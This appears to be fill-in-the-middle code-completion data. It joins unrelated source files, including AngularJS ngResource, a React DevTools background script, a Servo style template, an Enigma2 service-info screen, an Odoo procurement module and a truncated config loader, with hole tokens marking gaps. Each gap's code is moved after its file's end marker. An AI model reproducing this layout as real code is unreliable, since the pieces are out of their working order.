url = url.replace(new RegExp('(/?):' + urlParam + '(\\W|$)', 'g'), function(match,
leadingSlashes, tail) {
if (tail.charAt(0) === '/') {
return tail;
} else {
return leadingSlashes + tail;
}
});
}
});
// strip trailing slashes and set the url (unless this behavior is specifically disabled)
if (self.defaults.stripTrailingSlashes) {
url = url.replace(/\/+$/, '') || '/';
}
// Collapse `/.` if found in the last URL path segment before the query.
// E.g. `http://url.com/id/.format?q=x` becomes `http://url.com/id.format?q=x`.
url = url.replace(/\/\.(?=\w+($|\?))/, '.');
// Replace escaped `/\.` with `/.`.
// (If `\.` comes from a param value, it will be encoded as `%5C.`.)
config.url = protocolAndIpv6 + url.replace(/\/(\\|%5C)\./, '/.');
// set params - delegate param encoding to $http
forEach(params, function(value, key) {
if (!self.urlParams[key]) {
config.params = config.params || {};
config.params[key] = value;
}
});
}
};
function resourceFactory(url, paramDefaults, actions, options) {
var route = new Route(url, options);
actions = extend({}, provider.defaults.actions, actions);
function extractParams(data, actionParams) {
var ids = {};
actionParams = extend({}, paramDefaults, actionParams);
forEach(actionParams, function(value, key) {
if (isFunction(value)) { value = value(data); }
ids[key] = value && value.charAt && value.charAt(0) === '@' ?
lookupDottedPath(data, value.substr(1)) : value;
});
return ids;
}
function defaultResponseInterceptor(response) {
return response.resource;
}
function Resource(value) {
shallowClearAndCopy(value || {}, this);
}
Resource.prototype.toJSON = function() {
var data = extend({}, this);
delete data.$promise;
delete data.$resolved;
delete data.$cancelRequest;
return data;
};
forEach(actions, function(action, name) {
var hasBody = action.hasBody === true || (action.hasBody !== false && /^(POST|PUT|PATCH)$/i.test(action.method));
var numericTimeout = action.timeout;
var cancellable = isDefined(action.cancellable) ?
action.cancellable : route.defaults.cancellable;
if (numericTimeout && !isNumber(numericTimeout)) {
$log.debug('ngResource:\n' +
' Only numeric values are allowed as `timeout`.\n' +
' Promises are not supported in $resource, because the same value would ' +
'be used for multiple requests. If you are looking for a way to cancel ' +
'requests, you should use the `cancellable` option.');
delete action.timeout;
numericTimeout = null;
}
Resource[name] = function(a1, a2, a3, a4) {
var params = {}, data, success, error;
switch (arguments.length) {
case 4:
error = a4;
success = a3;
// falls through
case 3:
case 2:
if (isFunction(a2)) {
if (isFunction(a1)) {
success = a1;
error = a2;
break;
}
success = a2;
error = a3;
// falls through
} else {
params = a1;
data = a2;
success = a3;
break;
}
// falls through
case 1:
if (isFunction(a1)) success = a1;
else if (hasBody) data = a1;
else params = a1;
break;
case 0: break;
default:
throw $resourceMinErr('badargs',
'Expected up to 4 arguments [params, data, success, error], got {0} arguments',
arguments.length);
}
var isInstanceCall = this instanceof Resource;
var value = isInstanceCall ? data : (action.isArray ? [] : new Resource(data));
var httpConfig = {};
var responseInterceptor = action.interceptor && action.interceptor.response ||
defaultResponseInterceptor;
var responseErrorInterceptor = action.interceptor && action.interceptor.responseError ||
undefined;
var hasError = !!error;
var hasResponseErrorInterceptor = !!responseErrorInterceptor;
var timeoutDeferred;
var numericTimeoutPromise;
forEach(action, function(value, key) {
switch (key) {
default:
httpConfig[key] = copy(value);
break;
case 'params':
case 'isArray':
case 'interceptor':
case 'cancellable':
break;
}
});
if (!isInstanceCall && cancellable) {
timeoutDeferred = $q.defer();
httpConfig.timeout = timeoutDeferred.promise;
if (numericTimeout) {
numericTimeoutPromise = $timeout(timeoutDeferred.resolve, numericTimeout);
}
}
if (hasBody) httpConfig.data = data;
route.setUrlParams(httpConfig,
extend({}, extractParams(data, action.params || {}), params),
action.url);
var promise = $http(httpConfig).then(function(response) {
var data = response.data;
if (data) {
// Need to convert action.isArray to boolean in case it is undefined
if (isArray(data) !== (!!action.isArray)) {
throw $resourceMinErr('badcfg',
'Error in resource configuration for action `{0}`. Expected response to ' +
'contain an {1} but got an {2} (Request: {3} {4})', name, action.isArray ? 'array' : 'object',
isArray(data) ? 'array' : 'object', httpConfig.method, httpConfig.url);
}
if (action.isArray) {
value.length = 0;
forEach(data, function(item) {
if (typeof item === 'object') {
value.push(new Resource(item));
} else {
// Valid JSON values may be string literals, and these should not be converted
// into objects. These items will not have access to the Resource prototype
// methods, but unfortunately there
value.push(item);
}
});
} else {
var promise = value.$promise; // Save the promise
shallowClearAndCopy(data, value);
value.$promise = promise; // Restore the promise
}
}
response.resource = value;
return response;
}, function(response) {
response.resource = value;
return $q.reject(response);
});
promise = promise['finally'](function() {
value.$resolved = true;
if (!isInstanceCall && cancellable) {
value.$cancelRequest = noop;
$timeout.cancel(numericTimeoutPromise);
timeoutDeferred = numericTimeoutPromise = httpConfig.timeout = null;
}
});
promise = promise.then(
function(response) {
var value = responseInterceptor(response);
(success || noop)(value, response.headers, response.status, response.statusText);
return value;
},
(hasError || hasResponseErrorInterceptor) ?
function(response) {
if (hasError && !hasResponseErrorInterceptor) {
// Avoid `Possibly Unhandled Rejection` error,
// but still fulfill the returned promise with a rejection
promise.catch(noop);
}
if (hasError) error(response);
return hasResponseErrorInterceptor ?
responseErrorInterceptor(response) :
$q.reject(response);
} :
undefined);
if (!isInstanceCall) {
// we are creating instance / collection
// - set the initial promise
// - return the instance / collection
value.$promise = promise;
value.$resolved = false;
if (cancellable) value.$cancelRequest = cancelRequest;
return value;
}
// instance call
return promise;
function cancelRequest(value) {
promise.catch(noop);
if (timeoutDeferred !== null) {
timeoutDeferred.resolve(value);
}
}
};
Resource.prototype['$' + name] = function(params, success, error) {
if (isFunction(params)) {
error = success; success = params; params = {};
}
var result = Resource[name].call(this, params, this, success, error);
return result.$promise || result;
};
});
return Resource;
}
return resourceFactory;
}];
});
})(window, window.angular);<|fim▁end|>
|
*
* Use `$resourceProvider` to change the default behavior of the {@link ngResource.$resource}
|
<|file_name|>background.js<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2015-present, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*
* @flow
*/
'use strict';
/* global chrome */
var ports = {};<|fim▁hole|>
chrome.runtime.onConnect.addListener(function(port) {
var tab = null;
var name = null;
if (isNumeric(port.name)) {
tab = port.name;
name = 'devtools';
installContentScript(+port.name);
} else {
tab = port.sender.tab.id;
name = 'content-script';
}
if (!ports[tab]) {
ports[tab] = {
devtools: null,
'content-script': null,
};
}
ports[tab][name] = port;
if (ports[tab].devtools && ports[tab]['content-script']) {
doublePipe(ports[tab].devtools, ports[tab]['content-script']);
}
});
function isNumeric(str: string): boolean {
return +str + '' === str;
}
function installContentScript(tabId: number) {
chrome.tabs.executeScript(tabId, {file: '/build/contentScript.js'}, function() {
});
}
function doublePipe(one, two) {
one.onMessage.addListener(lOne);
function lOne(message) {
// console.log('dv -> rep', message);
two.postMessage(message);
}
two.onMessage.addListener(lTwo);
function lTwo(message) {
// console.log('rep -> dv', message);
one.postMessage(message);
}
function shutdown() {
one.onMessage.removeListener(lOne);
two.onMessage.removeListener(lTwo);
one.disconnect();
two.disconnect();
}
one.onDisconnect.addListener(shutdown);
two.onDisconnect.addListener(shutdown);
}<|fim▁end|>
| |
<|file_name|>inherited_table.mako.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
<%namespace name="helpers" file="/helpers.mako.rs" />
<% data.new_style_struct("InheritedTable", inherited=True, gecko_name="TableBorder") %>
${helpers.single_keyword("border-collapse", "separate collapse",
gecko_constant_prefix="NS_STYLE_BORDER",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-border-collapse")}
${helpers.single_keyword("empty-cells", "show hide",
gecko_constant_prefix="NS_STYLE_TABLE_EMPTY_CELLS",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-empty-cells")}
${helpers.single_keyword("caption-side", "top bottom",
extra_gecko_values="right left top-outside bottom-outside",
needs_conversion="True",
animation_value_type="discrete",
spec="https://drafts.csswg.org/css-tables/#propdef-caption-side")}
<%helpers:longhand name="border-spacing" animation_value_type="ComputedValue" boxed="True"
spec="https://drafts.csswg.org/css-tables/#propdef-border-spacing">
use app_units::Au;
use std::fmt;
use style_traits::ToCss;
use values::specified::{AllowQuirks, Length};
pub mod computed_value {
use app_units::Au;
use properties::animated_properties::Animatable;
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
#[derive(Clone, Copy, Debug, PartialEq, ToCss)]
pub struct T {
pub horizontal: Au,
pub vertical: Au,
}
/// https://drafts.csswg.org/css-transitions/#animtype-simple-list
impl Animatable for T {
#[inline]
fn add_weighted(&self, other: &Self, self_portion: f64, other_portion: f64)
-> Result<Self, ()> {
Ok(T {
horizontal: try!(self.horizontal.add_weighted(&other.horizontal,
self_portion, other_portion)),
vertical: try!(self.vertical.add_weighted(&other.vertical,
self_portion, other_portion)),
})
}
#[inline]
fn compute_distance(&self, other: &Self) -> Result<f64, ()> {
self.compute_squared_distance(other).map(|sd| sd.sqrt())
}
#[inline]
fn compute_squared_distance(&self, other: &Self) -> Result<f64, ()> {
Ok(try!(self.horizontal.compute_squared_distance(&other.horizontal)) +
try!(self.vertical.compute_squared_distance(&other.vertical)))
}
}
}
#[derive(Clone, Debug, HasViewportPercentage, PartialEq)]
#[cfg_attr(feature = "servo", derive(HeapSizeOf))]
pub struct SpecifiedValue {
pub horizontal: Length,
pub vertical: Option<Length>,
}
#[inline]
pub fn get_initial_value() -> computed_value::T {
computed_value::T {
horizontal: Au(0),
vertical: Au(0),
}
}
impl ToCss for SpecifiedValue {
fn to_css<W>(&self, dest: &mut W) -> fmt::Result
where W: fmt::Write,
{
try!(self.horizontal.to_css(dest));
if let Some(vertical) = self.vertical.as_ref() {
try!(dest.write_str(" "));
vertical.to_css(dest)?;
}
Ok(())
}
}
impl ToComputedValue for SpecifiedValue {
type ComputedValue = computed_value::T;
#[inline]
fn to_computed_value(&self, context: &Context) -> computed_value::T {
let horizontal = self.horizontal.to_computed_value(context);
computed_value::T {
horizontal: horizontal,
vertical: self.vertical.as_ref().map_or(horizontal, |v| v.to_computed_value(context)),
}
}
#[inline]
fn from_computed_value(computed: &computed_value::T) -> Self {
SpecifiedValue {
horizontal: ToComputedValue::from_computed_value(&computed.horizontal),
vertical: Some(ToComputedValue::from_computed_value(&computed.vertical)),
}
}
}
<|fim▁hole|> pub fn parse<'i, 't>(context: &ParserContext, input: &mut Parser<'i, 't>)
-> Result<SpecifiedValue,ParseError<'i>> {
let mut first = None;
let mut second = None;
match Length::parse_non_negative_quirky(context, input, AllowQuirks::Yes) {
Err(_) => (),
Ok(length) => {
first = Some(length);
if let Ok(len) = input.try(|i| Length::parse_non_negative_quirky(context, i, AllowQuirks::Yes)) {
second = Some(len);
}
}
}
match (first, second) {
(None, None) => Err(StyleParseError::UnspecifiedError.into()),
(Some(length), None) => {
Ok(SpecifiedValue {
horizontal: length,
vertical: None,
})
}
(Some(horizontal), Some(vertical)) => {
Ok(SpecifiedValue {
horizontal: horizontal,
vertical: Some(vertical),
})
}
(None, Some(_)) => unreachable!(),
}
}
</%helpers:longhand><|fim▁end|>
| |
<|file_name|>ServiceInfo.py<|end_file_name|><|fim▁begin|>from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
from Components.Converter.ChannelNumbers import channelnumbers
import skin
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
TYPE_VALUE_ORBIT_DEC = 5
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
elif valueType == TYPE_VALUE_ORBIT_DEC:
direction = 'E'
if b > 1800:
b = 3600 - b
direction = 'W'
b = ("%d.%d%s") % (b // 10, b % 10, direction)
else:
b = str(b)
x, y, w, h = skin.parameters.get("ServiceInfo",(0, 0, 300, 30))
xa, ya, wa, ha = skin.parameters.get("ServiceInfoLeft",(0, 0, 300, 25))
xb, yb, wb, hb = skin.parameters.get("ServiceInfoRight",(300, 0, 600, 25))
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, x, y, w, h, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, xa, ya, wa, ha, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, xb, yb, wb, hb, 0, RT_HALIGN_LEFT, b)
]
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
font = skin.fonts.get("ServiceInfo", ("Regular", 23, 25))
self.l.setFont(0, gFont(font[0], font[1]))
self.l.setItemHeight(font[2])
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self.skinName="ServiceInfoSimple"
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is a iStaticServiceInformation, not a iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["key_red"] = self["red"] = Label(_("Service"))
self["key_green"] = self["green"] = Label(_("PIDs"))
self["key_yellow"] = self["yellow"] = Label(_("Multiplex"))
self["key_blue"] = self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceOrGroup():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = "-"
videocodec = "-"
resolution = "-"
if self.info:
videocodec = ("MPEG2", "MPEG4", "MPEG1", "MPEG4-II", "VC1", "VC1-SM", "-" )[self.info and self.info.getInfo(iServiceInformation.sVideoType)]
width = self.info.getInfo(iServiceInformation.sVideoWidth)
height = self.info.getInfo(iServiceInformation.sVideoHeight)
if width > 0 and height > 0:
resolution = "%dx%d" % (width,height)
resolution += ("i", "p", "")[self.info.getInfo(iServiceInformation.sProgressive)]
resolution += str((self.info.getInfo(iServiceInformation.sFrameRate) + 500) / 1000)
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = "4:3"
else:
aspect = "16:9"
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Videoformat"), aspect, TYPE_TEXT),
(_("Videosize"), resolution, TYPE_TEXT),
(_("Videocodec"), videocodec, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Transponder type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Coderate LP"),
"code_rate_hp" : _("Coderate HP"),
"constellation" : _("Constellation"),
"transmission_mode": _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information": _("Hierarchy information") }
Labels = [(conv[i], tp_info[i], i == "orbital_position" and TYPE_VALUE_ORBIT_DEC or TYPE_VALUE_DEC) for i in tp_info.keys() if i in conv]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):<|fim▁hole|> (_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Channel"), channelnumbers.getChannelNumber(frontendData["frequency"], frontendData["tuner_number"]), TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue;
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v<|fim▁end|>
|
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), chr(ord('A') + frontendData["tuner_number"]), TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
|
<|file_name|>procurement.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from psycopg2 import OperationalError
from odoo import api, fields, models, registry, _
from odoo.exceptions import UserError
import odoo.addons.decimal_precision as dp
PROCUREMENT_PRIORITIES = [('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')]
class ProcurementGroup(models.Model):
'''
The procurement group class is used to group products together
when computing procurements. (tasks, physical products, ...)
The goal is that when you have one sale order of several products
and the products are pulled from the same or several location(s), to keep
having the moves grouped into pickings that represent the sale order.
Used in: sales order (to group delivery order lines like the so), pull/push
rules (to pack like the delivery order), on orderpoints (e.g. for wave picking
all the similar products together).
Grouping is made only if the source and the destination is the same.
Suppose you have 4 lines on a picking from Output where 2 lines will need
to come from Input (crossdock) and 2 lines coming from Stock -> Output As
the four procurement orders will have the same group ids from the SO, the
move from input will have a stock.picking with 2 grouped lines and the move
from stock will have 2 grouped lines also.
The name is usually the name of the original document (sale order) or a
sequence computed if created manually.
'''
_name = 'procurement.group'
_description = 'Procurement Requisition'
_order = "id desc"
name = fields.Char(
'Reference',
default=lambda self: self.env['ir.sequence'].next_by_code('procurement.group') or '',
required=True)
move_type = fields.Selection([
('direct', 'Partial'),
('one', 'All at once')], string='Delivery Type', default='direct',
required=True)
procurement_ids = fields.One2many('procurement.order', 'group_id', 'Procurements')
class ProcurementRule(models.Model):
''' A rule describe what a procurement should do; produce, buy, move, ... '''
_name = 'procurement.rule'
_description = "Procurement Rule"
_order = "name"
name = fields.Char(
'Name', required=True, translate=True,
help="This field will fill the packing origin and the name of its moves")
active = fields.Boolean(
'Active', default=True,
help="If unchecked, it will allow you to hide the rule without removing it.")
group_propagation_option = fields.Selection([
('none', 'Leave Empty'),
('propagate', 'Propagate'),
('fixed', 'Fixed')], string="Propagation of Procurement Group", default='propagate')
group_id = fields.Many2one('procurement.group', 'Fixed Procurement Group')
action = fields.Selection(
selection='_get_action', string='Action',
required=True)
sequence = fields.Integer('Sequence', default=20)
company_id = fields.Many2one('res.company', 'Company')
@api.model
def _get_action(self):
return []
class ProcurementOrder(models.Model):
""" Procurement Orders """
_name = "procurement.order"
_description = "Procurement"
_order = 'priority desc, date_planned, id asc'
_inherit = ['mail.thread','ir.needaction_mixin']
name = fields.Text('Description', required=True)
origin = fields.Char('Source Document', help="Reference of the document that created this Procurement. This is automatically completed by Odoo.")
company_id = fields.Many2one(
'res.company', 'Company',
default=lambda self: self.env['res.company']._company_default_get('procurement.orer'),
required=True)
# These two fields are used for scheduling
priority = fields.Selection(
PROCUREMENT_PRIORITIES, string='Priority', default='1',
required=True, index=True, track_visibility='onchange')
date_planned = fields.Datetime(
'Scheduled Date', default=fields.Datetime.now,
required=True, index=True, track_visibility='onchange')
group_id = fields.Many2one('procurement.group', 'Procurement Group')
rule_id = fields.Many2one(
'procurement.rule', 'Rule',
track_visibility='onchange',
help="Chosen rule for the procurement resolution. Usually chosen by the system but can be manually set by the procurement manager to force an unusual behavior.")
product_id = fields.Many2one(
'product.product', 'Product',
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
product_qty = fields.Float(
'Quantity',
digits=dp.get_precision('Product Unit of Measure'),
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
product_uom = fields.Many2one(
'product.uom', 'Product Unit of Measure',
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
state = fields.Selection([
('cancel', 'Cancelled'),
('confirmed', 'Confirmed'),
('exception', 'Exception'),
('running', 'Running'),
('done', 'Done')], string='Status', default='confirmed',
copy=False, required=True, track_visibility='onchange')
@api.model
def _needaction_domain_get(self):
return [('state', '=', 'exception')]
@api.model
def create(self, vals):
procurement = super(ProcurementOrder, self).create(vals)
if not self._context.get('procurement_autorun_defer'):
procurement.run()
return procurement
@api.multi
def unlink(self):
if any(procurement.state == 'cancel' for procurement in self):
raise UserError(_('You cannot delete procurements that are in cancel state.'))
return super(ProcurementOrder, self).unlink()
@api.multi
def do_view_procurements(self):
'''
This function returns an action that display existing procurement orders
of same procurement group of given ids.
'''
action = self.env.ref('procurement.do_view_procurements').read()[0]
action['domain'] = [('group_id', 'in', self.mapped('group_id').ids)]
return action
@api.onchange('product_id')
def onchange_product_id(self):<|fim▁hole|> self.product_uom = self.product_id.uom_id.id
@api.multi
def cancel(self):
to_cancel = self.filtered(lambda procurement: procurement.state != 'done')
if to_cancel:
return to_cancel.write({'state': 'cancel'})
@api.multi
def reset_to_confirmed(self):
return self.write({'state': 'confirmed'})
@api.multi
def run(self, autocommit=False):
# TDE FIXME: avoid browsing everything -> avoid prefetching ?
for procurement in self:
# we intentionnaly do the browse under the for loop to avoid caching all ids which would be resource greedy
# and useless as we'll make a refresh later that will invalidate all the cache (and thus the next iteration
# will fetch all the ids again)
if procurement.state not in ("running", "done"):
try:
if procurement._assign():
res = procurement._run()
if res:
procurement.write({'state': 'running'})
else:
procurement.write({'state': 'exception'})
else:
procurement.message_post(body=_('No rule matching this procurement'))
procurement.write({'state': 'exception'})
if autocommit:
self.env.cr.commit()
except OperationalError:
if autocommit:
self.env.cr.rollback()
continue
else:
raise
return True
@api.multi
@api.returns('self', lambda procurements: [procurement.id for procurement in procurements])
def check(self, autocommit=False):
# TDE FIXME: check should not do something, just check
procurements_done = self.env['procurement.order']
for procurement in self:
try:
result = procurement._check()
if result:
procurements_done += procurement
if autocommit:
self.env.cr.commit()
except OperationalError:
if autocommit:
self.env.cr.rollback()
continue
else:
raise
if procurements_done:
procurements_done.write({'state': 'done'})
return procurements_done
#
# Method to overwrite in different procurement modules
#
@api.multi
def _find_suitable_rule(self):
'''This method returns a procurement.rule that depicts what to do with the given procurement
in order to complete its needs. It returns False if no suiting rule is found.
:rtype: int or False
'''
return False
@api.multi
def _assign(self):
'''This method check what to do with the given procurement in order to complete its needs.
It returns False if no solution is found, otherwise it stores the matching rule (if any) and
returns True.
:rtype: boolean
'''
# if the procurement already has a rule assigned, we keep it (it has a higher priority as it may have been chosen manually)
if self.rule_id:
return True
elif self.product_id.type not in ('service', 'digital'):
rule = self._find_suitable_rule()
if rule:
self.write({'rule_id': rule.id})
return True
return False
@api.multi
def _run(self):
'''This method implements the resolution of the given procurement
:returns: True if the resolution of the procurement was a success, False otherwise to set it in exception
'''
return True
@api.multi
def _check(self):
'''Returns True if the given procurement is fulfilled, False otherwise
:rtype: boolean
'''
return False
#
# Scheduler
#
@api.model
def run_scheduler(self, use_new_cursor=False, company_id=False):
'''
Call the scheduler to check the procurement order. This is intented to be done for all existing companies at
the same time, so we're running all the methods as SUPERUSER to avoid intercompany and access rights issues.
@param use_new_cursor: if set, use a dedicated cursor and auto-commit after processing each procurement.
This is appropriate for batch jobs only.
@return: Dictionary of values
'''
ProcurementSudo = self.env['procurement.order'].sudo()
try:
if use_new_cursor:
cr = registry(self._cr.dbname).cursor()
self = self.with_env(self.env(cr=cr)) # TDE FIXME
# Run confirmed procurements
procurements = ProcurementSudo.search([('state', '=', 'confirmed')] + (company_id and [('company_id', '=', company_id)] or []))
while procurements:
procurements.run(autocommit=use_new_cursor)
if use_new_cursor:
self.env.cr.commit()
procurements = ProcurementSudo.search([('id', 'not in', procurements.ids), ('state', '=', 'confirmed')] + (company_id and [('company_id', '=', company_id)] or []))
# Check done procurements
procurements = ProcurementSudo.search([('state', '=', 'running')] + (company_id and [('company_id', '=', company_id)] or []))
while procurements:
procurements.check(autocommit=use_new_cursor)
if use_new_cursor:
self.env.cr.commit()
procurements = ProcurementSudo.search([('id', 'not in', procurements.ids), ('state', '=', 'running')] + (company_id and [('company_id', '=', company_id)] or []))
finally:
if use_new_cursor:
try:
self.env.cr.close()
except Exception:
pass
return {}<|fim▁end|>
|
""" Finds UoM of changed product. """
if self.product_id:
|
<|file_name|>config.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>from ruamel.yaml import YAML
from six import iteritems
_required = ['server']
class Config(object):
def __init__(self, configFile):
self.configFile = configFile
self._configData = {}
self.yaml = YAML()
self._inBaseConfig = []
def loadConfig(self):
configData = self._readConfig(self.configFile)
self._validate(configData)
self._configData = configData
def _readConfig(self, fileName):
try:
with open(fileName, mode='r') as config:
configData = self.yaml.load(config)
if not configData:
configData = {}
# if this is the base server config, store what keys we loaded
if fileName == self.configFile:
self._inBaseConfig = list(configData.keys())
except Exception as e:
raise ConfigError(fileName, e)
